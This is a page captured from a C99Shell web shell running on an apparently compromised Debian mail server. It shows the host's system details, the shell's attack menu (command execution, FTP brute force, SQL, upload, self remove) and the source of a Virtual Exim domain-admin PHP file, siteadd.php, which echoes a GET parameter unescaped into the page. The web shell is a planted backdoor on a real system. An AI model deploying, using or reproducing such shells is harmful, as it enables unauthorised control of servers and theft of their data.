!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/vexim/   drwxr-xr-x
Free 130.07 GB of 142.11 GB (91.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     siteadd.php (6.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
  
include_once dirname(__FILE__) . '/config/variables.php';
  include_once 
dirname(__FILE__) . '/config/authsite.php';
  include_once 
dirname(__FILE__) . '/config/functions.php';
  include_once 
dirname(__FILE__) . '/config/httpheaders.php';
?>
<html>
  <head>
    <title><?php echo _('Virtual Exim') . ': ' _('Manage Domains'); ?></title>
    <link rel="stylesheet" href="style.css" type="text/css">
  </head>
  <body onLoad="document.siteadd.domain.focus()">
    <?php include dirname(__FILE__) . '/config/header.php'?>
    <div id='menu'>
      <a href="site.php"><?php echo _('Manage Domains'); ?></a><br>
      <a href="sitepassword.php"><?php echo _('Site Password'); ?></a><br>
      <br><a href="logout.php"><?php echo _('Logout'); ?></a><br>
    </div>
    <div id="forms">
      <form name="siteadd" method="post" action="siteaddsubmit.php">
        <table align="center">
          <tr>
            <td><?php echo _('New Domain'); ?>:</td>
            <td><input name="domain" type="text" class="textfield"></td>
            <td>
              <?php echo _('The name of the new domain you are adding'); ?>
            </td>
          </tr>
          <?php
            
if ($_GET['type'] == "local") {
          
?>
          <tr>
            <td><?php echo _('Domain Admin'); ?>:</td>
            <td>
              <input name="localpart" type="text" value="postmaster"
                class="textfield">
            </td>
            <td>
              <?php
                
echo _('The username of the domain\'s administrator account');
              
?>
            </td>
          </tr>
          <tr>
            <td><?php _('Password'); ?>:</td>
            <td>
              <input name="clear" type="password" class="textfield">
            </td>
          </tr>
          <tr>
            <td><?php echo _('Verify Password'); ?>:</td>
            <td>
              <input name="vclear" type="password" class="textfield">
            </td>
          </tr>
          <tr>
            <td><?php echo _('System UID'); ?>:</td>
            <td>
              <input name="uid" type="text" class="textfield"
                value="<?php echo $uid?>">
            </td>
          </tr>
          <tr>
            <td><?php echo _('System GID'); ?>:</td>
            <td>
              <input name="gid" type="text" class="textfield"
                value="<?php echo $gid?>">
            </td>
          </tr>
          <tr>
            <td><?php echo _('Domain Mail directory'); ?>:</td>
            <td>
              <input name="maildir" type="text" class="textfield"
                value="<?php echo $mailroot?>">
            </td>
            <td>
              <?php
                
echo _('Create the domain directory below this top-level
                  mailstore'
);
              
?>
            </td>
          </tr>
          <tr>
            <td>
              <?php echo _('Maximum accounts'); ?><br>
              (<?php echo _("0 for unlimited"); ?>):
            </td>
            <td>
              <input type="text" size="5" name="max_accounts" value="0"
                class="textfield">
            </td>
          </tr>
          <tr>
            <td>
              <?php echo _('Max mailbox quota'); ?>
              (<?php echo _('0 for disabled'); ?>):
            </td>
            <td>
              <input name="quotas" size="5" type="text" class="textfield"
                value="0"><? echo _('Mb'); ?>
            </td>
          </tr>
          <tr>
            <td><?php echo _('Maximum message size'); ?>:</td>
            <td>
              <input name="maxmsgsize" size="5" type="text" class="textfield"
                value="0"><?php echo _('Kb'); ?>
            </td>
            <td>
              <?php echo _('The maximum size for incoming mail (user
                tunable)'
); ?>
            </td>
          </tr>
          <tr>
            <td><?php echo _('Spamassassin tag score'); ?>:</td>
            <td>
              <input name="sa_tag" size="5" type="text" class="textfield"
                value="<?php echo $sa_tag?>">
            </td>
            <td>
              <?php echo _('The score at the "X-Spam-Flag: YES" header will
                be added'
); ?>
            </td>
          </tr>
          <tr>
            <td><?php echo _('Spamassassin refuse score'); ?>:</td>
            <td>
              <input name="sa_refuse" size="5" type="text" class="textfield"
              value="<?php echo $sa_refuse?>">
            </td>
            <td><?php echo _('The score at which to refuse potentially spam
              mail and not deliver'
); ?>
            </td>
          </tr>
          <tr>
            <td><?php echo _('Spamassassin enabled?'); ?></td>
            <td>
              <input name="spamassassin" type="checkbox" class="textfield">
            </td>
          </tr>
          <tr>
            <td><?php echo _('Anti Virus enabled?'); ?></td>
            <td>
              <input name="avscan" type="checkbox" class="textfield">
            </td>
          </tr>
          <tr>
            <td><?php echo _('Enable piping mail to command?'); ?></td>
            <td>
              <input name="pipe" type="checkbox" class="textfield">
            </td>
          </tr>
          <tr>
            <td><?php echo _('Domain enabled?'); ?></td>
            <td>
              <input name="enabled" type="checkbox" class="textfield" checked>
            </td>
          </tr>
          <tr><td></td></tr>
        <?php
           
} else if ($_GET['type'] == "alias") {
        
?>
          <tr>
            <td><?php echo _('Redirect messages to domain'); ?>:</td>
            <td>
              <input name="aliasdest" type="text" class="textfield">
            </td>
          </tr>
        <?php
           
}
        
?>
          <tr>
            <td>
            </td>
            <td>
              <input name="type" type="hidden"
                value="<?php print $_GET['type']; ?>">
              <input name="admin" type="hidden" value="1">
              <input name="submit" type="submit"
                value="<?php echo _('Submit'); ?>">
            </td>
          </tr>
        </table>
      </form>
    </div>
  </body>
</html>
<!-- Layout and CSS tricks obtained from http://www.bluerobot.com/web/layouts/ -->

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0198 ]--